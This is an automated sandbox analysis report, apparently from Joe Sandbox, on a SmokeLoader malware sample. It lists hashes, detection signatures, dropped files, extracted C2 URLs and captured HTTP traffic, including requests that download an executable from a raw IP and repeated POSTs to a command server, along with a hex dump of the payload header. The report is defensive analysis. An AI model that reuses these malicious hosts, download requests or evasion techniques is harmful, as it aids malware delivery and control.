Windows Analysis Report
file.exe

Overview

General Information

Sample Name: file.exe
Analysis ID: 753427
MD5: 44c87d3bc316eefe4dcbf66afed72abc
SHA1: 96bde412ef761b4d53506ae4ed2999bc9dcaf137
SHA256: 731e22be2a6b39304919dc24b750a720b23a0f1ed996a9b74cf0b088de6144b1
Tags: exe
Infos:

Detection

SmokeLoader
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Yara detected UAC Bypass using CMSTP
Benign windows process drops PE files
Malicious sample detected (through community Yara rule)
Detected unpacking (overwrites its own PE header)
Yara detected SmokeLoader
System process connects to network (likely due to code injection or exploit)
Detected unpacking (changes PE section rights)
Antivirus detection for URL or domain
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for dropped file
Maps a DLL or memory area into another process
Machine Learning detection for sample
Checks for kernel code integrity (NtQuerySystemInformation(CodeIntegrityInformation))
Deletes itself after installation
Machine Learning detection for dropped file
C2 URLs / IPs found in malware configuration
Creates a thread in another existing process (thread injection)
Hides that the sample has been downloaded from the Internet (zone.identifier)
Checks if the current machine is a virtual machine (disk enumeration)
Uses 32bit PE files
Yara signature match
Antivirus or Machine Learning detection for unpacked file
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Detected potential crypto function
Sample execution stops while process was sleeping (likely an evasion)
JA3 SSL client fingerprint seen in connection with other malware
Contains functionality to call native functions
PE file contains executable resources (Code or Archives)
IP address seen in connection with other malware
Downloads executable code via HTTP
Contains long sleeps (>= 3 min)
Creates a DirectInput object (often for capturing keystrokes)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Drops files with a non-matching file extension (content does not match file extension)
Drops PE files
Tries to load missing DLLs
Contains functionality to read the PEB
Uses a known web browser user agent for HTTP communication
Checks if the current process is being debugged
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Dropped file seen in connection with other malware
Queries disk information (often used to detect virtual machines)
Found large amount of non-executed APIs
Uses Microsoft's Enhanced Cryptographic Provider

Classification

AV Detection
barindex
Antivirus detection for URL or domain
Source: http://piratia.su/tmp/ URL Reputation: Label: malware
Source: http://piratia.su/tmp/ URL Reputation: Label: malware
Multi AV Scanner detection for domain / URL
Source: freeshmex.at Virustotal: Detection: 18% Perma Link
Multi AV Scanner detection for dropped file
Source: C:\Users\user\AppData\Local\Temp\Tdryuqayh.tmp ReversingLabs: Detection: 24%
Source: C:\Users\user\AppData\Local\Temp\Tdryuqayh.tmp Virustotal: Detection: 35% Perma Link
Machine Learning detection for sample
Source: file.exe Joe Sandbox ML: detected
Machine Learning detection for dropped file
Source: C:\Users\user\AppData\Roaming\gfgsrbs Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\EBC4.exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\B87E.exe Joe Sandbox ML: detected
Antivirus or Machine Learning detection for unpacked file
Source: 12.2.EBC4.exe.2d5112c.2.unpack Avira: Label: TR/Patched.Ren.Gen7
Source: 5.2.B87E.exe.400000.0.unpack Avira: Label: TR/Crypt.ZPACK.Gen2
Source: 00000001.00000000.373140844.0000000004631000.00000020.80000000.00040000.00000000.sdmp Malware Configuration Extractor: SmokeLoader {"C2 list": ["http://cracker.biz/tmp/", "http://piratia-life.ru/tmp/", "http://piratia.su/tmp/"]}
Uses Microsoft's Enhanced Cryptographic Provider
Source: C:\Users\user\AppData\Local\Temp\B87E.exe Code function: 5_2_004AFD42 CryptGetHashParam,CryptDestroyHash, 5_2_004AFD42
Source: C:\Users\user\AppData\Local\Temp\B87E.exe Code function: 5_2_0046A04E CryptEncrypt, 5_2_0046A04E
Source: C:\Users\user\AppData\Local\Temp\B87E.exe Code function: 5_2_004E828B CryptEncrypt, 5_2_004E828B
Source: C:\Users\user\AppData\Local\Temp\B87E.exe Code function: 5_2_004AF42D CryptHashData,CryptHashData, 5_2_004AF42D
Source: C:\Users\user\AppData\Local\Temp\B87E.exe Code function: 5_2_004B74F7 CryptExportKey, 5_2_004B74F7
Source: C:\Users\user\AppData\Local\Temp\B87E.exe Code function: 5_2_004B6481 CryptExportKey, 5_2_004B6481
Source: C:\Users\user\AppData\Local\Temp\B87E.exe Code function: 5_2_004AE5BE CryptBinaryToStringA, 5_2_004AE5BE
Source: C:\Users\user\AppData\Local\Temp\B87E.exe Code function: 5_2_004B776F CryptReleaseContext, 5_2_004B776F
Source: C:\Users\user\AppData\Local\Temp\B87E.exe Code function: 5_2_004B3784 CryptDecrypt, 5_2_004B3784
Source: C:\Users\user\AppData\Local\Temp\B87E.exe Code function: 5_2_004C3A08 CryptImportKey, 5_2_004C3A08
Source: C:\Users\user\AppData\Local\Temp\B87E.exe Code function: 5_2_004C3AD6 CryptDestroyKey,CryptDestroyKey, 5_2_004C3AD6
Source: C:\Users\user\AppData\Local\Temp\B87E.exe Code function: 5_2_004C3A88 CryptEncrypt,CryptEncrypt, 5_2_004C3A88
Source: C:\Users\user\AppData\Local\Temp\B87E.exe Code function: 5_2_004B3B61 CryptReleaseContext, 5_2_004B3B61
Source: C:\Users\user\AppData\Local\Temp\B87E.exe Code function: 5_2_004C3B30 CryptReleaseContext,CryptReleaseContext, 5_2_004C3B30
Source: C:\Users\user\AppData\Local\Temp\B87E.exe Code function: 5_2_004AEBD6 CryptAcquireContextA,CryptAcquireContextA, 5_2_004AEBD6
Source: C:\Users\user\AppData\Local\Temp\B87E.exe Code function: 5_2_004C3D56 CryptBinaryToStringA,CryptBinaryToStringA, 5_2_004C3D56
Source: C:\Users\user\AppData\Local\Temp\B87E.exe Code function: 5_2_004C3D04 CryptBinaryToStringA,CryptBinaryToStringA, 5_2_004C3D04
Source: C:\Users\user\AppData\Local\Temp\B87E.exe Code function: 5_2_004B2E2B CryptHashData,CryptHashData, 5_2_004B2E2B
Source: C:\Users\user\AppData\Local\Temp\B87E.exe Code function: 5_2_004B6ECB CryptExportKey, 5_2_004B6ECB

Exploits
barindex
Yara detected UAC Bypass using CMSTP
Source: Yara match File source: 12.2.EBC4.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 7.2.EBC4.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 0000000C.00000002.507752658.0000000000413000.00000040.00000001.01000000.00000009.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000002.489025318.0000000000413000.00000040.00000001.01000000.00000009.sdmp, type: MEMORY

Compliance
barindex
Detected unpacking (overwrites its own PE header)
Source: C:\Users\user\AppData\Local\Temp\B87E.exe Unpacked PE file: 5.2.B87E.exe.400000.0.unpack
Source: C:\Users\user\AppData\Local\Temp\EBC4.exe Unpacked PE file: 7.2.EBC4.exe.400000.0.unpack
Source: C:\Users\user\AppData\Local\Temp\EBC4.exe Unpacked PE file: 12.2.EBC4.exe.400000.0.unpack
Uses 32bit PE files
Source: file.exe Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: C:\Users\user\Desktop\file.exe File opened: C:\Windows\SysWOW64\msvcr100.dll Jump to behavior
Source: unknown HTTPS traffic detected: 5.135.247.111:443 -> 192.168.2.4:49715 version: TLS 1.2
Source: Binary string: c:\omtnkdoj\bnwv\yogisfk\cqf.pdb source: EBC4.exe, 00000007.00000002.489007839.0000000000410000.00000040.00000001.01000000.00000009.sdmp, EBC4.exe, 0000000C.00000002.507739087.0000000000410000.00000040.00000001.01000000.00000009.sdmp
Source: Binary string: C:\cine\zu.pdb source: EBC4.exe, 00000007.00000000.479192618.0000000000401000.00000020.00000001.01000000.00000009.sdmp, EBC4.exe, 0000000C.00000000.488527200.0000000000401000.00000020.00000001.01000000.00000009.sdmp, EBC4.exe.1.dr
Source: Binary string: c:\bfllk\pdgh\qovxk\wqdtbmac.pdb source: EBC4.exe, 0000000C.00000002.564623481.0000000004E74000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: C:\supohizoza_pujuvi\reyo fewokelobivuvi80\yahomizidita\huhise.pdb source: B87E.exe, 00000005.00000000.450920035.0000000000401000.00000020.00000001.01000000.00000007.sdmp, B87E.exe.1.dr
Source: Binary string: c:\jfmo\tlcp\nyvnyt\obocmwsb.pdb source: EBC4.exe, 0000000C.00000002.564623481.0000000004E74000.00000004.00000800.00020000.00000000.sdmp, EBC4.exe, 0000000C.00000002.514725083.0000000002D4B000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: BC:\supohizoza_pujuvi\reyo fewokelobivuvi80\yahomizidita\huhise.pdb` source: B87E.exe, 00000005.00000000.450920035.0000000000401000.00000020.00000001.01000000.00000007.sdmp, B87E.exe.1.dr
Source: Binary string: c:\bfllk\pdgh\qovxk\wqdtbmac.pdb/; source: EBC4.exe, 0000000C.00000002.564623481.0000000004E74000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: c:\jfmo\tlcp\nyvnyt\obocmwsb.pdb/; source: EBC4.exe, 0000000C.00000002.564623481.0000000004E74000.00000004.00000800.00020000.00000000.sdmp, EBC4.exe, 0000000C.00000002.514725083.0000000002D4B000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: C:\benejizipica\vexihosibul\fubecilecoz58_wowuceroweman-56\c.pdb source: file.exe, gfgsrbs.1.dr
Source: Binary string: DC:\benejizipica\vexihosibul\fubecilecoz58_wowuceroweman-56\c.pdb source: file.exe, gfgsrbs.1.dr

Networking
barindex
System process connects to network (likely due to code injection or exploit)
Source: C:\Windows\explorer.exe Domain query: thepokeway.nl
Source: C:\Windows\explorer.exe Domain query: freeshmex.at
Source: C:\Windows\explorer.exe Network Connect: 123.253.32.170 80 Jump to behavior
C2 URLs / IPs found in malware configuration
Source: Malware configuration extractor URLs: http://cracker.biz/tmp/
Source: Malware configuration extractor URLs: http://piratia-life.ru/tmp/
Source: Malware configuration extractor URLs: http://piratia.su/tmp/
JA3 SSL client fingerprint seen in connection with other malware
Source: Joe Sandbox View JA3 fingerprint: ce5f3254611a8c095a3d821d44539877
IP address seen in connection with other malware
Source: Joe Sandbox View IP Address: 178.31.176.42 178.31.176.42
Downloads executable code via HTTP
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.14.2Date: Thu, 24 Nov 2022 19:13:08 GMTContent-Type: application/octet-streamContent-Length: 1041408Last-Modified: Thu, 24 Nov 2022 19:10:04 GMTConnection: keep-aliveETag: "637fc18c-fe400"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f0 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 57 b6 e1 fb 13 d7 8f a8 13 d7 8f a8 13 d7 8f a8 ae 98 19 a8 12 d7 8f a8 0d 85 1a a8 0c d7 8f a8 0d 85 0c a8 96 d7 8f a8 34 11 f4 a8 1a d7 8f a8 13 d7 8e a8 87 d7 8f a8 0d 85 0b a8 3d d7 8f a8 0d 85 1b a8 12 d7 8f a8 0d 85 1e a8 12 d7 8f a8 52 69 63 68 13 d7 8f a8 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 8d 67 92 62 00 00 00 00 00 00 00 00 e0 00 03 01 0b 01 09 00 00 9e 01 00 00 3a 30 00 00 00 00 00 e6 6f 00 00 00 10 00 00 00 b0 01 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 00 00 00 00 00 00 05 00 00 00 00 00 00 00 00 b0 31 00 00 04 00 00 0d 84 10 00 02 00 00 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 5c a0 01 00 64 00 00 00 00 80 31 00 e8 2e 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 70 12 00 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 3c 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 10 00 00 20 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 f4 9c 01 00 00 10 00 00 00 9e 01 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 a8 cf 2f 00 00 b0 01 00 00 12 0e 00 00 a2 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 e8 2e 00 00 00 80 31 00 00 30 00 00 00 b4 0f 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Uses a known web browser user agent for HTTP communication
Source: global traffic HTTP traffic detected: GET /upload/index.php HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: thepokeway.nl
Source: global traffic HTTP traffic detected: POST /tmp/ HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://crimlvf.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 167Host: freeshmex.at
Source: global traffic HTTP traffic detected: POST /tmp/ HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://hdnuetf.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 178Host: freeshmex.at
Source: global traffic HTTP traffic detected: POST /tmp/ HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://jccvg.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 200Host: freeshmex.at
Source: global traffic HTTP traffic detected: POST /tmp/ HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://fjuand.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 293Host: freeshmex.at
Source: global traffic HTTP traffic detected: POST /tmp/ HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://ugahgtu.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 177Host: freeshmex.at
Source: global traffic HTTP traffic detected: GET /root2.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: 123.253.32.170
Source: global traffic HTTP traffic detected: POST /tmp/ HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://cbcxtvmmly.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 253Host: freeshmex.at
Source: global traffic HTTP traffic detected: POST /tmp/ HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://jmhsk.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 227Host: freeshmex.at
Source: global traffic HTTP traffic detected: POST /tmp/ HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://cxmexebq.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 312Host: freeshmex.at
Source: global traffic HTTP traffic detected: POST /tmp/ HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://yvudclyoxi.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 338Host: freeshmex.at
Source: global traffic HTTP traffic detected: POST /tmp/ HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://ewydclhcm.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 331Host: freeshmex.at
Source: global traffic HTTP traffic detected: POST /tmp/ HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://ufwbup.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 222Host: freeshmex.at
Source: global traffic HTTP traffic detected: POST /tmp/ HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://dmwhplnj.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 241Host: freeshmex.at
Source: global traffic HTTP traffic detected: POST /tmp/ HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://xrqcl.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 211Host: freeshmex.at
Source: global traffic HTTP traffic detected: POST /tmp/ HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://uuvtnsw.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 183Host: freeshmex.at
Source: global traffic HTTP traffic detected: POST /tmp/ HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://fffclev.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 243Host: freeshmex.at
Source: global traffic HTTP traffic detected: POST /tmp/ HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://ykhdc.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 271Host: freeshmex.at
Source: global traffic HTTP traffic detected: POST /tmp/ HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://qhcqdle.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 329Host: freeshmex.at
Source: global traffic HTTP traffic detected: POST /tmp/ HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://bussc.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 187Host: freeshmex.at
Source: global traffic HTTP traffic detected: POST /tmp/ HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://rfiijpjae.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 179Host: freeshmex.at
Source: global traffic HTTP traffic detected: POST /tmp/ HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://bowsudmxn.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 219Host: freeshmex.at
Source: global traffic HTTP traffic detected: POST /tmp/ HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://slkwmgvhmh.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 354Host: freeshmex.at
Source: global traffic HTTP traffic detected: POST /tmp/ HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://bpaefk.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 166Host: freeshmex.at
Source: global traffic HTTP traffic detected: POST /tmp/ HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://uaymxpjge.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 300Host: freeshmex.at
Source: global traffic HTTP traffic detected: POST /tmp/ HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://wfwtjemoof.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 277Host: freeshmex.at
Source: global traffic HTTP traffic detected: POST /tmp/ HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://rpaquepn.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 268Host: freeshmex.at
Source: global traffic HTTP traffic detected: POST /tmp/ HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://uphkrwii.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 197Host: freeshmex.at
Source: global traffic HTTP traffic detected: POST /tmp/ HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://mifwrnveyh.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 110Host: freeshmex.at
Source: global traffic HTTP traffic detected: POST /tmp/ HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://motvx.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 259Host: freeshmex.at
Source: global traffic HTTP traffic detected: POST /tmp/ HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://bfgpwwck.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 116Host: freeshmex.at
Source: global traffic HTTP traffic detected: POST /tmp/ HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://agqugnol.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 337Host: freeshmex.at
Source: global traffic HTTP traffic detected: POST /tmp/ HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://gxxlrwdw.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 172Host: freeshmex.at
Source: global traffic HTTP traffic detected: POST /tmp/ HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://jhiornjar.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 353Host: freeshmex.at
Source: global traffic HTTP traffic detected: POST /tmp/ HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://sloljasy.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 116Host: freeshmex.at
Source: global traffic HTTP traffic detected: POST /tmp/ HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://yrxav.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 263Host: freeshmex.at
Source: unknown Network traffic detected: HTTP traffic on port 49715 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49715
Source: unknown TCP traffic detected without corresponding DNS query: 123.253.32.170
Source: unknown TCP traffic detected without corresponding DNS query: 123.253.32.170
Source: unknown TCP traffic detected without corresponding DNS query: 123.253.32.170
Source: unknown TCP traffic detected without corresponding DNS query: 123.253.32.170
Source: unknown TCP traffic detected without corresponding DNS query: 123.253.32.170
Source: unknown TCP traffic detected without corresponding DNS query: 123.253.32.170
Source: unknown TCP traffic detected without corresponding DNS query: 123.253.32.170
Source: unknown TCP traffic detected without corresponding DNS query: 123.253.32.170
Source: unknown TCP traffic detected without corresponding DNS query: 123.253.32.170
Source: unknown TCP traffic detected without corresponding DNS query: 123.253.32.170
Source: unknown TCP traffic detected without corresponding DNS query: 123.253.32.170
Source: unknown TCP traffic detected without corresponding DNS query: 123.253.32.170
Source: unknown TCP traffic detected without corresponding DNS query: 123.253.32.170
Source: unknown TCP traffic detected without corresponding DNS query: 123.253.32.170
Source: unknown TCP traffic detected without corresponding DNS query: 123.253.32.170
Source: unknown TCP traffic detected without corresponding DNS query: 123.253.32.170
Source: unknown TCP traffic detected without corresponding DNS query: 123.253.32.170
Source: unknown TCP traffic detected without corresponding DNS query: 123.253.32.170
Source: unknown TCP traffic detected without corresponding DNS query: 123.253.32.170
Source: unknown TCP traffic detected without corresponding DNS query: 123.253.32.170
Source: unknown TCP traffic detected without corresponding DNS query: 123.253.32.170
Source: unknown TCP traffic detected without corresponding DNS query: 123.253.32.170
Source: unknown TCP traffic detected without corresponding DNS query: 123.253.32.170
Source: unknown TCP traffic detected without corresponding DNS query: 123.253.32.170
Source: unknown TCP traffic detected without corresponding DNS query: 123.253.32.170
Source: unknown TCP traffic detected without corresponding DNS query: 123.253.32.170
Source: unknown TCP traffic detected without corresponding DNS query: 123.253.32.170
Source: unknown TCP traffic detected without corresponding DNS query: 123.253.32.170
Source: unknown TCP traffic detected without corresponding DNS query: 123.253.32.170
Source: unknown TCP traffic detected without corresponding DNS query: 123.253.32.170
Source: unknown TCP traffic detected without corresponding DNS query: 123.253.32.170
Source: unknown TCP traffic detected without corresponding DNS query: 123.253.32.170
Source: unknown TCP traffic detected without corresponding DNS query: 123.253.32.170
Source: unknown TCP traffic detected without corresponding DNS query: 123.253.32.170
Source: unknown TCP traffic detected without corresponding DNS query: 123.253.32.170
Source: unknown TCP traffic detected without corresponding DNS query: 123.253.32.170
Source: unknown TCP traffic detected without corresponding DNS query: 123.253.32.170
Source: unknown TCP traffic detected without corresponding DNS query: 123.253.32.170
Source: unknown TCP traffic detected without corresponding DNS query: 123.253.32.170
Source: unknown TCP traffic detected without corresponding DNS query: 123.253.32.170
Source: unknown TCP traffic detected without corresponding DNS query: 123.253.32.170
Source: unknown TCP traffic detected without corresponding DNS query: 123.253.32.170
Source: unknown TCP traffic detected without corresponding DNS query: 123.253.32.170
Source: unknown TCP traffic detected without corresponding DNS query: 123.253.32.170
Source: unknown TCP traffic detected without corresponding DNS query: 123.253.32.170
Source: unknown TCP traffic detected without corresponding DNS query: 123.253.32.170
Source: unknown TCP traffic detected without corresponding DNS query: 123.253.32.170
Source: unknown TCP traffic detected without corresponding DNS query: 123.253.32.170
Source: unknown TCP traffic detected without corresponding DNS query: 123.253.32.170
Source: unknown TCP traffic detected without corresponding DNS query: 123.253.32.170
Source: unknown HTTP traffic detected: POST /tmp/ HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://crimlvf.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 167Host: freeshmex.at
Source: unknown DNS traffic detected: queries for: freeshmex.at
Source: global traffic HTTP traffic detected: GET /upload/index.php HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: thepokeway.nl
Source: global traffic HTTP traffic detected: GET /root2.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: 123.253.32.170
Source: unknown HTTPS traffic detected: 5.135.247.111:443 -> 192.168.2.4:49715 version: TLS 1.2

Key, Mouse, Clipboard, Microphone and Screen Capturing
barindex
Yara detected SmokeLoader
